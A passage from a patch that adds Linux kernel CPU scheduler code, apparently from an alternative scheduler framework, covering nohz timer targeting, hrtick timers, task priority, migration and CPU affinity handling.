++ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/**
++	 * Alt schedule FW doesn't support sched_feat yet
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	if (task_cpu(p) == new_cpu)
++		return;
++	trace_sched_migrate_task(p, new_cpu);
++	rseq_migrate(p);
++	perf_event_task_migrate(p);
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_preempt_mask(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
++{
++	cpumask_copy(&p->cpus_mask, new_mask);
++	p->nr_cpus_allowed = cpumask_weight(new_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, new_mask);
++}
++
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	__do_set_cpus_allowed(p, new_mask);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	if (!src->user_cpus_ptr)
++		return 0;
++
++	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!dst->user_cpus_ptr)
++		return -ENOMEM;
++
++	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    avoid the load balancer to place new tasks on the to be removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select the CPU on the other node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t allow_mask, mask;
++
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
++
++	return best_mask_cpu(task_cpu(p), &allow_mask);
++}
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task, its something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 const struct cpumask *new_mask,
++					 u32 flags,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	struct cpumask *user_mask = NULL;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, new_mask);
++
++	if (flags & SCA_USER)
++		user_mask = clear_user_cpus_ptr(p);
++
++	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++	kfree(user_mask);
++
++	return ret;
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it's executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
